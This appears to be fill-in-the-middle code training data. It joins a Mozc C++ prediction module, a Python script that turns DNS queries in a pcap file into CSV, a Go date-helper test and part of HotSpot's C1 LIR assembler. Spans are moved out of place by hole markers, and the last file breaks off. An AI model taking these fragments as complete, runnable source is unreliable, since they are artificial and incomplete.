  // Then the |raw_result| contains:
// [begin, min_iter): reference results in the above loop.
// [max_iter, end): (maybe) redundant results.
// [min_iter, max_iter): remaining results.
// Here, we revive the redundant results up to five in the result cost order.
constexpr size_t kDoNotDeleteNum = 5;
if (std::distance(max_iter, raw_result.end()) >= kDoNotDeleteNum) {
std::partial_sort(max_iter, max_iter + kDoNotDeleteNum, raw_result.end(),
ResultWCostLess());
max_iter += kDoNotDeleteNum;
} else {
max_iter = raw_result.end();
}
// Finally output the result.
results->insert(results->end(), raw_result.begin(), max_iter);
}
void DictionaryPredictor::AggregateBigramPrediction(
const ConversionRequest &request, const Segments &segments,
Segment::Candidate::SourceInfo source_info,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
// TODO(toshiyuki): Support suggestion from the last 2 histories.
// ex) "六本木"+"ヒルズ"->"レジデンス"
std::string history_key, history_value;
if (!GetHistoryKeyAndValue(segments, &history_key, &history_value)) {
return;
}
AddBigramResultsFromHistory(history_key, history_value, request, segments,
source_info, results);
}
void DictionaryPredictor::AddBigramResultsFromHistory(
const std::string &history_key, const std::string &history_value,
const ConversionRequest &request, const Segments &segments,
Segment::Candidate::SourceInfo source_info,
std::vector<Result> *results) const {
// Check that history_key/history_value are in the dictionary.
FindValueCallback find_history_callback(history_value);
dictionary_->LookupPrefix(history_key, request, &find_history_callback);
  // The history value is not found in the dictionary.
  // The user may have created this history candidate from T13N or segment
  // expand/shrink operations.
if (!find_history_callback.found()) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
GetPredictiveResultsForBigram(*dictionary_, history_key, history_value,
request, segments, BIGRAM, cutoff_threshold,
source_info, unknown_id_, results);
const size_t bigram_results_size = results->size() - prev_results_size;
  // If the size reaches max_results_size,
  // we don't show the candidates, since disambiguation from
  // 256 candidates is hard. (It may exceed max_results_size, because this is
  // just a limit for each backend, so the total number may be larger.)
if (bigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
// Obtain the character type of the last history value.
const size_t history_value_size = Util::CharsLen(history_value);
if (history_value_size == 0) {
return;
}
const Util::ScriptType history_ctype = Util::GetScriptType(history_value);
const Util::ScriptType last_history_ctype = Util::GetScriptType(
Util::Utf8SubString(history_value, history_value_size - 1, 1));
for (size_t i = prev_results_size; i < results->size(); ++i) {
CheckBigramResult(find_history_callback.token(), history_ctype,
last_history_ctype, request, &(*results)[i]);
}
}
// Filter out irrelevant bigrams. For example, we don't want to
// suggest "リカ" from the history "アメ".
void DictionaryPredictor::CheckBigramResult(
const Token &history_token, const Util::ScriptType history_ctype,
const Util::ScriptType last_history_ctype, const ConversionRequest &request,
Result *result) const {
DCHECK(result);
const std::string &history_key = history_token.key;
const std::string &history_value = history_token.value;
const std::string key(result->key, history_key.size(),
result->key.size() - history_key.size());
const std::string value(result->value, history_value.size(),
result->value.size() - history_value.size());
// Don't suggest 0-length key/value.
if (key.empty() || value.empty()) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. key, value or both are empty.");
return;
}
const Util::ScriptType ctype =
Util::GetScriptType(Util::Utf8SubString(value, 0, 1));
if (history_ctype == Util::KANJI && ctype == Util::KATAKANA) {
// Do not filter "六本木ヒルズ"
MOZC_WORD_LOG(*result, "Valid bigram. Kanji + Katakana pattern.");
return;
}
  // If freq("アメ") < freq("アメリカ"), we don't
  // need to suggest it, as "アメリカ" should already be
  // suggested when the user types "アメ".
// Note that wcost = -500 * log(prob).
if (ctype != Util::KANJI && history_token.cost > result->wcost) {
result->removed = true;
MOZC_WORD_LOG(*result,
"Removed. The prefix's score is lower than the whole.");
return;
}
  // If the character type doesn't change, this boundary might NOT
  // be a word boundary. Only use the suggestion if the entire key is
  // reasonably long.
const size_t key_len = Util::CharsLen(result->key);
if (ctype == last_history_ctype &&
((ctype == Util::HIRAGANA && key_len <= 9) ||
(ctype == Util::KATAKANA && key_len <= 5))) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. Short Hiragana (<= 9) or Katakana (<= 5)");
return;
}
// The suggested key/value pair must exist in the dictionary.
// For example, we don't want to suggest "ターネット" from
// the history "イン".
// If character type is Kanji and the suggestion is not a
// zero_query_suggestion, we relax this condition, as there are
  // many Kanji-compounds which may not be in the dictionary. For example,
// we want to suggest "霊長類研究所" from the history "京都大学".
if (ctype == Util::KANJI && Util::CharsLen(value) >= 2) {
// Do not filter this.
    // TODO(toshiyuki): one-length kanji prediction may be annoying except for
    // some exceptions, e.g. "駅", "口", etc.
MOZC_WORD_LOG(*result, "Valid bigram. Kanji suffix (>= 2).");
return;
}
  // Check if the word is in the dictionary or not.
  // For Hiragana words, check if that word exists as a key in the dictionary.
  // This is for a situation where
  // ありがとうございました is not in the dictionary, but
  // ありがとう御座いました is in the dictionary.
if (ctype == Util::HIRAGANA) {
if (!dictionary_->HasKey(key)) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. No keys are found.");
return;
}
} else {
FindValueCallback callback(value);
dictionary_->LookupPrefix(key, request, &callback);
if (!callback.found()) {
result->removed = true;
MOZC_WORD_LOG(*result, "Removed. No prefix found.");
return;
}
}
MOZC_WORD_LOG(*result, "Valid bigram.");
}
void DictionaryPredictor::GetPredictiveResults(
const DictionaryInterface &dictionary, const std::string &history_key,
const ConversionRequest &request, const Segments &segments,
PredictionTypes types, size_t lookup_limit,
Segment::Candidate::SourceInfo source_info, int unknown_id_,
std::vector<Result> *results) {
if (!request.has_composer()) {
std::string input_key = history_key;
input_key.append(segments.conversion_segment(0).key());
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// If we have ambiguity for the input, get expanded key.
// Example1 roman input: for "あk", we will get |base|, "あ" and |expanded|,
// "か", "き", etc
// Example2 kana input: for "あか", we will get |base|, "あ" and |expanded|,
// "か", and "が".
std::string base;
std::set<std::string> expanded;
request.composer().GetQueriesForPrediction(&base, &expanded);
std::string input_key;
if (expanded.empty()) {
input_key.assign(history_key).append(base);
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// `non_expanded_original_key` keeps the original key request before
// key expansions. This key is passed to the callback so that it can
// identify whether the key is actually expanded or not.
const std::string non_expanded_original_key =
IsEnableNewSpatialScoring(request)
? history_key + segments.conversion_segment(0).key()
: "";
// |expanded| is a very small set, so calling LookupPredictive multiple
// times is not so expensive. Also, the number of lookup results is limited
// by |lookup_limit|.
for (const std::string &expanded_char : expanded) {
input_key.assign(history_key).append(base).append(expanded_char);
PredictiveLookupCallback callback(types, lookup_limit, input_key.size(),
nullptr, source_info, unknown_id_,
non_expanded_original_key,
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
}
}
void DictionaryPredictor::GetPredictiveResultsForBigram(
const DictionaryInterface &dictionary, const std::string &history_key,
const std::string &history_value, const ConversionRequest &request,
const Segments &segments, PredictionTypes types, size_t lookup_limit,
Segment::Candidate::SourceInfo source_info, int unknown_id_,
std::vector<Result> *results) const {
if (!request.has_composer()) {
std::string input_key = history_key;
input_key.append(segments.conversion_segment(0).key());
PredictiveBigramLookupCallback callback(
types, lookup_limit, input_key.size(), nullptr, history_value,
source_info, unknown_id_, "", GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
return;
}
// If we have ambiguity for the input, get expanded key.
// Example1 roman input: for "あk", we will get |base|, "あ" and |expanded|,
// "か", "き", etc
// Example2 kana input: for "あか", we will get |base|, "あ" and |expanded|,
// "か", and "が".
std::string base;
std::set<std::string> expanded;
request.composer().GetQueriesForPrediction(&base, &expanded);
const std::string input_key = history_key + base;
const std::string non_expanded_original_key =
IsEnableNewSpatialScoring(request)
? history_key + segments.conversion_segment(0).key()
: "";
PredictiveBigramLookupCallback callback(
types, lookup_limit, input_key.size(),
expanded.empty() ? nullptr : &expanded, history_value, source_info,
unknown_id_, non_expanded_original_key, GetSpatialCostParams(request),
results);
dictionary.LookupPredictive(input_key, request, &callback);
}
void DictionaryPredictor::GetPredictiveResultsForEnglishKey(
const DictionaryInterface &dictionary, const ConversionRequest &request,
const std::string &input_key, PredictionTypes types, size_t lookup_limit,
std::vector<Result> *results) const {
const size_t prev_results_size = results->size();
if (Util::IsUpperAscii(input_key)) {
// For upper case key, look up its lower case version and then transform
// the results to upper case.
std::string key(input_key);
Util::LowerString(&key);
PredictiveLookupCallback callback(types, lookup_limit, key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(key, request, &callback);
for (size_t i = prev_results_size; i < results->size(); ++i) {
Util::UpperString(&(*results)[i].value);
}
} else if (Util::IsCapitalizedAscii(input_key)) {
// For capitalized key, look up its lower case version and then transform
// the results to capital.
std::string key(input_key);
Util::LowerString(&key);
PredictiveLookupCallback callback(types, lookup_limit, key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE,
unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(key, request, &callback);
for (size_t i = prev_results_size; i < results->size(); ++i) {
Util::CapitalizeString(&(*results)[i].value);
}
} else {
// For other cases (lower and as-is), just look up directly.
PredictiveLookupCallback callback(
types, lookup_limit, input_key.size(), nullptr,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
}
// If input mode is FULL_ASCII, then convert the results to full-width.
if (request.has_composer() &&
request.composer().GetInputMode() == transliteration::FULL_ASCII) {
std::string tmp;
for (size_t i = prev_results_size; i < results->size(); ++i) {
tmp.assign((*results)[i].value);
japanese_util::HalfWidthAsciiToFullWidthAscii(tmp, &(*results)[i].value);
}
}
}
void DictionaryPredictor::GetPredictiveResultsUsingTypingCorrection(
const DictionaryInterface &dictionary, const std::string &history_key,
const ConversionRequest &request, const Segments &segments,
PredictionTypes types, size_t lookup_limit,
std::vector<Result> *results) const {
if (!request.has_composer()) {
return;
}
std::vector<composer::TypeCorrectedQuery> queries;
request.composer().GetTypeCorrectedQueriesForPrediction(&queries);
for (size_t query_index = 0; query_index < queries.size(); ++query_index) {
const composer::TypeCorrectedQuery &query = queries[query_index];
const std::string input_key = history_key + query.base;
const size_t previous_results_size = results->size();
PredictiveLookupCallback callback(
types, lookup_limit, input_key.size(),
query.expanded.empty() ? nullptr : &query.expanded,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_, "",
GetSpatialCostParams(request), results);
dictionary.LookupPredictive(input_key, request, &callback);
for (size_t i = previous_results_size; i < results->size(); ++i) {
(*results)[i].wcost += query.cost;
}
lookup_limit -= results->size() - previous_results_size;
if (lookup_limit <= 0) {
break;
}
}
}
// static
bool DictionaryPredictor::GetZeroQueryCandidatesForKey(
const ConversionRequest &request, const std::string &key,
const ZeroQueryDict &dict, std::vector<ZeroQueryResult> *results) {
const int32_t available_emoji_carrier =
request.request().available_emoji_carrier();
DCHECK(results);
results->clear();
auto range = dict.equal_range(key);
if (range.first == range.second) {
return false;
}
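// Non-emoji entries are always adopted. Emoji entries are filtered by the
// client's available emoji carriers; carrier-specific emoji are emitted via
// their Android PUA code point.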
for (; range.first != range.second; ++range.first) {
const auto &entry = range.first;
if (entry.type() != ZERO_QUERY_EMOJI) {
results->push_back(
std::make_pair(std::string(entry.value()), entry.type()));
continue;
}
if (available_emoji_carrier & Request::UNICODE_EMOJI &&
entry.emoji_type() & EMOJI_UNICODE) {
results->push_back(
std::make_pair(std::string(entry.value()), entry.type()));
continue;
}
if ((available_emoji_carrier & Request::DOCOMO_EMOJI &&
entry.emoji_type() & EMOJI_DOCOMO) ||
(available_emoji_carrier & Request::SOFTBANK_EMOJI &&
entry.emoji_type() & EMOJI_SOFTBANK) ||
(available_emoji_carrier & Request::KDDI_EMOJI &&
entry.emoji_type() & EMOJI_KDDI)) {
std::string android_pua;
Util::Ucs4ToUtf8(entry.emoji_android_pua(), &android_pua);
results->push_back(std::make_pair(android_pua, entry.type()));
}
}
return !results->empty();
}
// static
void DictionaryPredictor::AppendZeroQueryToResults(
const std::vector<ZeroQueryResult> &candidates, uint16_t lid, uint16_t rid,
std::vector<Result> *results) {
int cost = 0;
for (size_t i = 0; i < candidates.size(); ++i) {
// Increment cost to show the candidates in order.
constexpr int kSuffixPenalty = 10;
results->push_back(Result());
Result *result = &results->back();
result->SetTypesAndTokenAttributes(SUFFIX, Token::NONE);
result->SetSourceInfoForZeroQuery(candidates[i].second);
result->key = candidates[i].first;
result->value = candidates[i].first;
result->wcost = cost;
result->lid = lid;
result->rid = rid;
cost += kSuffixPenalty;
}
}
// Returns true if we add zero query result.
bool DictionaryPredictor::AggregateNumberZeroQueryPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
std::string number_key;
if (!GetNumberHistory(segments, &number_key)) {
return false;
}
std::vector<ZeroQueryResult> candidates_for_number_key;
GetZeroQueryCandidatesForKey(request, number_key, zero_query_number_dict_,
&candidates_for_number_key);
std::vector<ZeroQueryResult> default_candidates_for_number;
GetZeroQueryCandidatesForKey(request, "default", zero_query_number_dict_,
&default_candidates_for_number);
DCHECK(!default_candidates_for_number.empty());
AppendZeroQueryToResults(candidates_for_number_key, counter_suffix_word_id_,
counter_suffix_word_id_, results);
AppendZeroQueryToResults(default_candidates_for_number,
counter_suffix_word_id_, counter_suffix_word_id_,
results);
return true;
}
// Returns true if we add zero query result.
bool DictionaryPredictor::AggregateZeroQueryPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
const size_t history_size = segments.history_segments_size();
if (history_size <= 0) {
return false;
}
const Segment &last_segment = segments.history_segment(history_size - 1);
DCHECK_GT(last_segment.candidates_size(), 0);
const std::string &history_value = last_segment.candidate(0).value;
std::vector<ZeroQueryResult> candidates;
if (!GetZeroQueryCandidatesForKey(request, history_value, zero_query_dict_,
&candidates)) {
return false;
}
const uint16_t kId = 0; // EOS
AppendZeroQueryToResults(candidates, kId, kId, results);
return true;
}
void DictionaryPredictor::AggregateSuffixPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_GT(segments.conversion_segments_size(), 0);
DCHECK(!segments.conversion_segment(0).key().empty()); // Not zero query
// Uses larger cutoff (kPredictionMaxResultsSize) in order to consider
// all suffix entries.
const size_t cutoff_threshold = kPredictionMaxResultsSize;
const std::string kEmptyHistoryKey = "";
GetPredictiveResults(*suffix_dictionary_, kEmptyHistoryKey, request, segments,
SUFFIX, cutoff_threshold,
Segment::Candidate::SOURCE_INFO_NONE, unknown_id_,
results);
}
void DictionaryPredictor::AggregateZeroQuerySuffixPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK_GT(segments.conversion_segments_size(), 0);
DCHECK(segments.conversion_segment(0).key().empty());
if (AggregateNumberZeroQueryPrediction(request, segments, results)) {
return;
}
AggregateZeroQueryPrediction(request, segments, results);
if (IsLatinInputMode(request)) {
// We do not want zero query results from suffix dictionary for Latin
// input mode. For example, we do not need "です", "。" just after "when".
return;
}
// Uses larger cutoff (kPredictionMaxResultsSize) in order to consider
// all suffix entries.
const size_t cutoff_threshold = kPredictionMaxResultsSize;
const std::string kEmptyHistoryKey = "";
GetPredictiveResults(
*suffix_dictionary_, kEmptyHistoryKey, request, segments, SUFFIX,
cutoff_threshold,
Segment::Candidate::DICTIONARY_PREDICTOR_ZERO_QUERY_SUFFIX, unknown_id_,
results);
}
void DictionaryPredictor::AggregateEnglishPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
const std::string &input_key = segments.conversion_segment(0).key();
GetPredictiveResultsForEnglishKey(*dictionary_, request, input_key, ENGLISH,
cutoff_threshold, results);
size_t unigram_results_size = results->size() - prev_results_size;
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
void DictionaryPredictor::AggregateEnglishPredictionUsingRawInput(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
if (!request.has_composer()) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
const size_t prev_results_size = results->size();
std::string input_key;
request.composer().GetRawString(&input_key);
GetPredictiveResultsForEnglishKey(*dictionary_, request, input_key, ENGLISH,
cutoff_threshold, results);
size_t unigram_results_size = results->size() - prev_results_size;
if (unigram_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
void DictionaryPredictor::AggregateTypeCorrectingPrediction(
const ConversionRequest &request, const Segments &segments,
std::vector<Result> *results) const {
DCHECK(results);
DCHECK(dictionary_);
const size_t prev_results_size = results->size();
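// Guard: if a very large number of candidates has already been aggregated,
// skip the typing-correction lookup to keep latency bounded.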
if (prev_results_size > 10000) {
return;
}
const size_t cutoff_threshold = GetCandidateCutoffThreshold(segments);
// Currently, history key is never utilized.
const std::string kEmptyHistoryKey = "";
GetPredictiveResultsUsingTypingCorrection(
*dictionary_, kEmptyHistoryKey, request, segments, TYPING_CORRECTION,
cutoff_threshold, results);
if (results->size() - prev_results_size >= cutoff_threshold) {
results->resize(prev_results_size);
return;
}
}
bool DictionaryPredictor::ShouldAggregateRealTimeConversionResults(
const ConversionRequest &request, const Segments &segments) {
constexpr size_t kMaxRealtimeKeySize = 300; // 300 bytes in UTF8
const std::string &key = segments.conversion_segment(0).key();
if (key.empty() || key.size() >= kMaxRealtimeKeySize) {
// 1) If key is empty, realtime conversion doesn't work.
// 2) If the key is too long, we'll hit a performance issue.
return false;
}
return (segments.request_type() == Segments::PARTIAL_SUGGESTION ||
request.config().use_realtime_conversion() ||
IsMixedConversionEnabled(request.request()));
}
bool DictionaryPredictor::IsZipCodeRequest(const std::string &key) {
if (key.empty()) {
return false;
}
for (ConstChar32Iterator iter(key); !iter.Done(); iter.Next()) {
const char32 c = iter.Get();
if (!('0' <= c && c <= '9') && (c != '-')) {
return false;
}
}
return true;
}
} // namespace mozc
#undef MOZC_WORD_LOG_MESSAGE
#undef MOZC_WORD_LOG<|fim▁end|>
|
SetTypesAndTokenAttributes(types, token.attributes);
key = token.key;
value = token.value;
wcost = token.cost;
|
<|file_name|>dns-pcap-to-csv.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2
#
# Copyright 2016 Philipp Winter <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Turn a pcap file into a CSV file.
Extract timestamp, source IP address, and query name of all DNS queries in the
given pcap, and turn it into a CSV.
"""<|fim▁hole|>
# We exclude the following two measurement hosts.
MEASUREMENT_HOSTS = frozenset(["92.243.1.186", "198.83.85.34"])
def process_file(pcap_file):
packets = scapy.rdpcap(pcap_file)
for packet in packets:
if not packet.haslayer(scapy.IP):
continue
if not packet.haslayer(scapy.DNSQR):
continue
query = packet[scapy.DNSQR].qname
src_addr = packet[scapy.IP].src
# Skip DNS response.
if src_addr in MEASUREMENT_HOSTS:
continue
print "%s,%s,%s" % (packet.time, packet[scapy.IP].src, query.lower())
return 0
if __name__ == "__main__":
if len(sys.argv) != 2:
print >> sys.stderr, "\nUsage: %s PCAP_FILE\n" % sys.argv[0]
sys.exit(1)
pcap_file = sys.argv[1]
sys.exit(process_file(pcap_file))<|fim▁end|>
|
import sys
import scapy.all as scapy
|
<|file_name|>beginning_test.go<|end_file_name|><|fim▁begin|>package datedsl
import (
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func TestBeginningOfSecond(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfSecond()
expected := parse("Fri Jul 17 10:13:59 MST 2015")
assert.Equal(t, expected.String(), value.String())
assert.Equal(t, 0, value.Value().Nanosecond())
}<|fim▁hole|> expected := parse("Fri Jul 17 10:13:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestBeginningOfHour(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfHour()
expected := parse("Fri Jul 17 10:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestBeginningOfDay(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfDay()
expected := parse("Fri Jul 17 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestFirstDayOfMonth(t *testing.T) {
value := New(parse("Fri Jul 17 09:54:37 MST 2015")).BeginningOfMonth()
expected := parse("Wed Jul 1 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func TestFirstDayOfYear(t *testing.T) {
value := New(parse("Fri Jul 17 09:54:37 MST 2015")).BeginningOfYear()
expected := parse("Thu Jan 1 00:00:00 MST 2015")
assert.Equal(t, expected.String(), value.String())
}
func parse(s string) time.Time {
t, _ := time.Parse(time.UnixDate, s)
return t
}<|fim▁end|>
|
func TestBeginningOfMinute(t *testing.T) {
value := New(parse("Fri Jul 17 10:13:59 MST 2015")).BeginningOfMinute()
|
<|file_name|>c1_LIRAssembler.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#include "precompiled.hpp"
#include "c1/c1_Compilation.hpp"
#include "c1/c1_Instruction.hpp"
#include "c1/c1_InstructionPrinter.hpp"
#include "c1/c1_LIRAssembler.hpp"
#include "c1/c1_MacroAssembler.hpp"
#include "c1/c1_ValueStack.hpp"
#include "ci/ciInstance.hpp"
#include "runtime/os.hpp"
void LIR_Assembler::patching_epilog(PatchingStub* patch, LIR_PatchCode patch_code, Register obj, CodeEmitInfo* info) {
// We must have enough patching space so that call can be inserted.
// We cannot use fat nops here, since the concurrent code rewrite may transiently
// create the illegal instruction sequence.
while ((intx) _masm->pc() - (intx) patch->pc_start() < NativeGeneralJump::instruction_size) {
_masm->nop();
}
patch->install(_masm, patch_code, obj, info);
append_code_stub(patch);
#ifdef ASSERT
Bytecodes::Code code = info->scope()->method()->java_code_at_bci(info->stack()->bci());
if (patch->id() == PatchingStub::access_field_id) {
switch (code) {
case Bytecodes::_putstatic:
case Bytecodes::_getstatic:
case Bytecodes::_putfield:
case Bytecodes::_getfield:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_klass_id) {
switch (code) {
case Bytecodes::_new:
case Bytecodes::_anewarray:
case Bytecodes::_multianewarray:
case Bytecodes::_instanceof:
case Bytecodes::_checkcast:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_mirror_id) {
switch (code) {
case Bytecodes::_putstatic:
case Bytecodes::_getstatic:
case Bytecodes::_ldc:
case Bytecodes::_ldc_w:
break;
default:
ShouldNotReachHere();
}
} else if (patch->id() == PatchingStub::load_appendix_id) {
Bytecodes::Code bc_raw = info->scope()->method()->raw_code_at_bci(info->stack()->bci());
assert(Bytecodes::has_optional_appendix(bc_raw), "unexpected appendix resolution");
} else {
ShouldNotReachHere();
}
#endif
}
PatchingStub::PatchID LIR_Assembler::patching_id(CodeEmitInfo* info) {
IRScope* scope = info->scope();
Bytecodes::Code bc_raw = scope->method()->raw_code_at_bci(info->stack()->bci());
if (Bytecodes::has_optional_appendix(bc_raw)) {
return PatchingStub::load_appendix_id;
}
return PatchingStub::load_mirror_id;
}
//---------------------------------------------------------------
LIR_Assembler::LIR_Assembler(Compilation* c):
_compilation(c)
, _masm(c->masm())
, _bs(Universe::heap()->barrier_set())
, _frame_map(c->frame_map())
, _current_block(NULL)
, _pending_non_safepoint(NULL)
, _pending_non_safepoint_offset(0)
{
_slow_case_stubs = new CodeStubList();
}
LIR_Assembler::~LIR_Assembler() {
}
void LIR_Assembler::check_codespace() {
CodeSection* cs = _masm->code_section();
if (cs->remaining() < (int)(NOT_LP64(1*K)LP64_ONLY(2*K))) {
BAILOUT("CodeBuffer overflow");
}
}
void LIR_Assembler::append_code_stub(CodeStub* stub) {
_slow_case_stubs->append(stub);
}
void LIR_Assembler::emit_stubs(CodeStubList* stub_list) {
for (int m = 0; m < stub_list->length(); m++) {
CodeStub* s = (*stub_list)[m];
check_codespace();
CHECK_BAILOUT();
#ifndef PRODUCT
if (CommentedAssembly) {
stringStream st;<|fim▁hole|> _masm->block_comment(st.as_string());
}
#endif
s->emit_code(this);
#ifdef ASSERT
s->assert_no_unbound_labels();
#endif
}
}
void LIR_Assembler::emit_slow_case_stubs() {
emit_stubs(_slow_case_stubs);
}
bool LIR_Assembler::needs_icache(ciMethod* method) const {
return !method->is_static();
}
int LIR_Assembler::code_offset() const {
return _masm->offset();
}
address LIR_Assembler::pc() const {
return _masm->pc();
}
// To bang the stack of this compiled method we use the stack size
// that the interpreter would need in case of a deoptimization. This
// removes the need to bang the stack in the deoptimization blob which
// in turn simplifies stack overflow handling.
int LIR_Assembler::bang_size_in_bytes() const {
return MAX2(initial_frame_size_in_bytes() + os::extra_bang_size_in_bytes(), _compilation->interpreter_frame_size());
}
void LIR_Assembler::emit_exception_entries(ExceptionInfoList* info_list) {
for (int i = 0; i < info_list->length(); i++) {
XHandlers* handlers = info_list->at(i)->exception_handlers();
for (int j = 0; j < handlers->length(); j++) {
XHandler* handler = handlers->handler_at(j);
assert(handler->lir_op_id() != -1, "handler not processed by LinearScan");
assert(handler->entry_code() == NULL ||
handler->entry_code()->instructions_list()->last()->code() == lir_branch ||
handler->entry_code()->instructions_list()->last()->code() == lir_delay_slot, "last operation must be branch");
if (handler->entry_pco() == -1) {
// entry code not emitted yet
if (handler->entry_code() != NULL && handler->entry_code()->instructions_list()->length() > 1) {
handler->set_entry_pco(code_offset());
if (CommentedAssembly) {
_masm->block_comment("Exception adapter block");
}
emit_lir_list(handler->entry_code());
} else {
handler->set_entry_pco(handler->entry_block()->exception_handler_pco());
}
assert(handler->entry_pco() != -1, "must be set now");
}
}
}
}
void LIR_Assembler::emit_code(BlockList* hir) {
if (PrintLIR) {
print_LIR(hir);
}
int n = hir->length();
for (int i = 0; i < n; i++) {
emit_block(hir->at(i));
CHECK_BAILOUT();
}
flush_debug_info(code_offset());
DEBUG_ONLY(check_no_unbound_labels());
}
void LIR_Assembler::emit_block(BlockBegin* block) {
if (block->is_set(BlockBegin::backward_branch_target_flag)) {
align_backward_branch_target();
}
// if this block is the start of an exception handler, record the
// PC offset of the first instruction for later construction of
// the ExceptionHandlerTable
if (block->is_set(BlockBegin::exception_entry_flag)) {
block->set_exception_handler_pco(code_offset());
}
#ifndef PRODUCT
if (PrintLIRWithAssembly) {
// don't print Phi's
InstructionPrinter ip(false);
block->print(ip);
}
#endif /* PRODUCT */
assert(block->lir() != NULL, "must have LIR");
X86_ONLY(assert(_masm->rsp_offset() == 0, "frame size should be fixed"));
#ifndef PRODUCT
if (CommentedAssembly) {
stringStream st;
st.print_cr(" block B%d [%d, %d]", block->block_id(), block->bci(), block->end()->printable_bci());
_masm->block_comment(st.as_string());
}
#endif
emit_lir_list(block->lir());
X86_ONLY(assert(_masm->rsp_offset() == 0, "frame size should be fixed"));
}
void LIR_Assembler::emit_lir_list(LIR_List* list) {
peephole(list);
int n = list->length();
for (int i = 0; i < n; i++) {
LIR_Op* op = list->at(i);
check_codespace();
CHECK_BAILOUT();
#ifndef PRODUCT
if (CommentedAssembly) {
// Don't record every op since that's too verbose. Print
// branches since they include block and stub names. Also print
// patching moves since they generate funny looking code.
if (op->code() == lir_branch ||
(op->code() == lir_move && op->as_Op1()->patch_code() != lir_patch_none)) {
stringStream st;
op->print_on(&st);
_masm->block_comment(st.as_string());
}
}
if (PrintLIRWithAssembly) {
// print out the LIR operation followed by the resulting assembly
list->at(i)->print(); tty->cr();
}
#endif /* PRODUCT */
op->emit_code(this);
if (compilation()->debug_info_recorder()->recording_non_safepoints()) {
process_debug_info(op);
}
#ifndef PRODUCT
if (PrintLIRWithAssembly) {
_masm->code()->decode();
}
#endif /* PRODUCT */
}
}
#ifdef ASSERT
void LIR_Assembler::check_no_unbound_labels() {
CHECK_BAILOUT();
for (int i = 0; i < _branch_target_blocks.length() - 1; i++) {
if (!_branch_target_blocks.at(i)->label()->is_bound()) {
tty->print_cr("label of block B%d is not bound", _branch_target_blocks.at(i)->block_id());
assert(false, "unbound label");
}
}
}
#endif
//----------------------------------debug info--------------------------------
void LIR_Assembler::add_debug_info_for_branch(CodeEmitInfo* info) {
int pc_offset = code_offset();
flush_debug_info(pc_offset);
